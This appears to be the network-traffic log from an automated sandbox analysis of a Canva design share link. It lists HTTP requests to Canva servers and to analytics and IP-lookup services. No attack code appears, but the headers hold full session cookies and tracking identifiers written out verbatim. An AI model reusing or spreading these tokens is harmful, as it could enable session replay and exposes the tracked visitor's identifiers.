cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20
Source: global trafficHTTP traffic detected: GET /chunk-batch/3e1e05ba24ee6f70.js+6d0e69feb99e4a90.js+60f63b285a3b4847.js+b2bb61a849e48145.js+c8a97d58e80df6e6.js+b68cf68769865eb5.js+edabeea6215279ba.js+131eb4392c201a0d.js+217c7ff3fe127f37.js+c2b308fb492f8999.js+bd755f9837164721.js+896e1adda18e46a3.js HTTP/1.1Host: chunk-composing.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /_ajax/csrf3/designinsight HTTP/1.1Host: www.canva.comConnection: keep-aliveX-Canva-Brand: BAAAAAAAAAAX-Canva-App: design_viewersec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Canva-Build-Sha: 4aaacc3X-Canva-User: UAAAAAAAAAAX-Canva-Analytics: AAMAA1dFQgA=sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-Canva-Request: recordheartbeatsec-ch-ua-platform-version: "10.0.0"X-Canva-Locale: enX-Canva-Build-Name: 20241118-21sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editorAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor","ts":1732114910544,"utm_s":"editor","utm_m":"link"}
Source: global trafficHTTP traffic detected: GET /site-insights.js HTTP/1.1Host: cdn.metadata.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /spp.pl?a=10000&.yp=10137834&gtmcb=1918978199 HTTP/1.1Host: sp.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web/ec8d2419e931aebd.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /p?c1=2&c2=34402982&ns_type=hidden&ns_event=page_view&c6=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&c7=&c9=&c8=&gtmcb=2124162551 HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /i?aid=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&e=pv&p=web&tv=1x1&url=www.canva.com&refr=&uid=undefined&gtmcb=2000780129 HTTP/1.1Host: p.tvpixel.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ajax/ae/createBatch HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor","ts":1732114910544,"utm_s":"editor","utm_m":"link"}
Source: global trafficHTTP traffic detected: GET /_ajax/csrf3/designinsight HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor","ts":1732114910544,"utm_s":"editor","utm_m":"link"}
Source: global trafficHTTP traffic detected: GET /pixel/config/1721.json HTTP/1.1Host: cdn.metadata.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.canva.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.canva.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /spp.pl?a=10000&.yp=10137834&gtmcb=1918978199 HTTP/1.1Host: sp.analytics.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A3=d=AQABBOH5PWcCENgT-oowxfORKcicBnQezVEFEgEBAQFLP2dHZ9xS0iMA_eMAAA&S=AQAAAm5IQOCq3-jGxsQ7TpQZtUQ
Source: global trafficHTTP traffic detected: GET /site-insights.js HTTP/1.1Host: cdn.metadata.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /i?aid=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&e=pv&p=web&tv=1x1&url=www.canva.com&refr=&uid=undefined&gtmcb=2000780129 HTTP/1.1Host: p.tvpixel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sp=0cccb407-2490-4125-ac5b-a35d21badbaa
Source: global trafficHTTP traffic detected: GET /p2?c1=2&c2=34402982&ns_type=hidden&ns_event=page_view&c6=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&c7=&c9=&c8=&gtmcb=2124162551 HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: UID=18F9c60199021e57f0570b91732114914; XID=18F9c60199021e57f0570b91732114914
Source: global trafficHTTP traffic detected: GET /g/collect?v=2&tid=G-EPWEMH6717&gtm=45je4bj0v872399471z8812729902za200zb812729902&_p=1732114904608&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&cid=1509316245.1732114914&ecid=1113172553&ul=en-us&sr=1280x1024&_fplc=0&ur=US-FL&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&sst.tft=1732114904608&sst.ude=0&_s=1&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor&dr=&dt=Canva%20Design&sid=1732114914&sct=1&seg=0&en=Loaded%20a%20Page&_fv=1&_nsi=1&_ss=1&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20290&ep.event_id=1732115097455_173211538951856&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=yes&ep.custom_consent_gtm_fpc_rtid=yes&epn.custom_data_newSession2=0&ep.custom_device_category=desktop&ep.custom_event_name=loaded&ep.custom_quantity=0&ep.custom_step=not%20set&ep.custom_user_type_by_user_id=guest&ep.event_action=a%20page&ep.custom_cart_item=%5Bobject%20Object%5D&ep.custom_doctype_id=TACQ-gtv2Yk&ep.custom_product_variant=web-2&ep.custom_country_code=US&ep.custom_app_name=web&up.custom_country_code=US&tfd=33182&richsstsse HTTP/1.1Host: ct.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.canva.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20; _ga_EPWEMH6717=GS1.1.1732114914.1.0.1732114914.0.0.1113172553; _ga=GA1.1.1509316245.1732114914
Source: global trafficHTTP traffic detected: GET /g/collect?v=2&tid=G-EPWEMH6717&gtm=45je4bj0v872399471z8812729902za200zb812729902&_p=1732114904608&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&cid=1509316245.1732114914&ecid=1113172553&ul=en-us&sr=1280x1024&_fplc=0&ur=US-FL&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&sst.tft=1732114904608&sst.ude=0&_s=2&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor&dr=&dt=Canva%20Design&sid=1732114914&sct=1&seg=0&en=new.user.engagement&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20290&ep.event_id=1732115097455_173211538951881&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=yes&ep.custom_consent_gtm_fpc_rtid=yes&epn.custom_data_newSession2=1&ep.custom_device_category=desktop&ep.custom_event_name=new.user.engagement&ep.custom_quantity=0&ep.custom_step=not%20set&ep.custom_user_type_by_user_id=guest&ep.event_action=no-value&ep.custom_cart_item=%5Bobject%20Object%5D&ep.custom_doctype_id=TACQ-gtv2Yk&ep.custom_product_variant=web-2&ep.custom_country_code=US&ep.custom_app_name=web&_et=6&tfd=33210&richsstsse HTTP/1.1Host: ct.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.canva.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20; _ga=GA1.1.1509316245.1732114914; _ga_EPWEMH6717=GS1.1.1732114914.1.0.1732114914.0.0.1113172553
Source: global trafficHTTP traffic detected: GET /_ajax/designinsight/heartbeats HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor","ts":1732114910544,"utm_s":"editor","utm_m":"link"}; Metadata_visitor_id=m3q0hwbly0n1ejeak4k; Metadata_session_id=m3q0hwbmy0cpch0dnpm; _ga=GA1.1.1509316245.1732114914; _ga_EPWEMH6717=GS1.1.1732114914.1.0.1732114914.0.0.1113172553
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pixel/config/1721.json HTTP/1.1Host: cdn.metadata.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
